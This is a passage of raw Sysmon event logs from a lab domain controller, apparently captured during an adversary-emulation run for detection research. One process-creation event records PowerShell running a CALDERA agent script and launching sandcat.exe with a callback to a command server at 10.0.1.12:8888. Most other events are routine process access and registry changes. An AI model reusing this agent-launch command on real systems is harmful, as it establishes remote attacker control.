09:20:05.123{5EBD8912-8CC1-6151-1B00-00000000FD01}20282104C:\Windows\system32\conhost.exe{5EBD8912-8CC5-6151-2000-00000000FD01}2552C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:05.108{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CC5-6151-2000-00000000FD01}2552C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:05.108{5EBD8912-8CC1-6151-1900-00000000FD01}20042516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC5-6151-2000-00000000FD01}2552C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+94910024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d9347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+9485b3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d5002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93db3a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d95aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d95aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d9593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d8665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d93b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d93710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d9347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+9485b3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d78363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+93d778d5(wow64) 154100x80000000000000001052886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:05.064{5EBD8912-8CC5-6151-2000-00000000FD01}2552C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 13241300x80000000000000001052885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:04.779{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000437) 11241100x80000000000000001052884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localEXE2021-09-27 09:20:04.764{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2021-09-23 08:15:50.994 10341000x80000000000000001052883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:04.107{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:04.107{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:04.092{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:04.092{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:03.951{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 17141700x80000000000000001052878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:03.607{5EBD8912-8CC1-6151-1900-00000000FD01}2004\PSHost.132772080010160578.2004.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x80000000000000001052877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:03.607{5EBD8912-8CC0-6151-1800-00000000FD01}1952\PSHost.132772080009378637.1952.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001052876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.514{5EBD8912-8CC0-6151-1000-00000000FD01}4401112C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001052875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.498{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.498{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.435{5EBD8912-8CBD-6151-0B00-00000000FD01}640808C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:03.404{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 11241100x80000000000000001052869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.217{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_bp315gsh.qb4.ps12021-09-27 09:20:03.217 11241100x80000000000000001052868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.217{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_va4qklza.rys.ps12021-09-27 09:20:03.217 10341000x80000000000000001052867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:03.170{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:03.014{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000436) 13241300x80000000000000001052864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:02.404{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001052863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:02.404{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001052862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:02.404{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\StaleAdapterDWORD (0x00000000) 10341000x80000000000000001052861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.342{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CC1-6151-1F00-00000000FD01}2076C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.342{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CC1-6151-1F00-00000000FD01}2076C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.232{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000007ae) 10341000x80000000000000001052858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 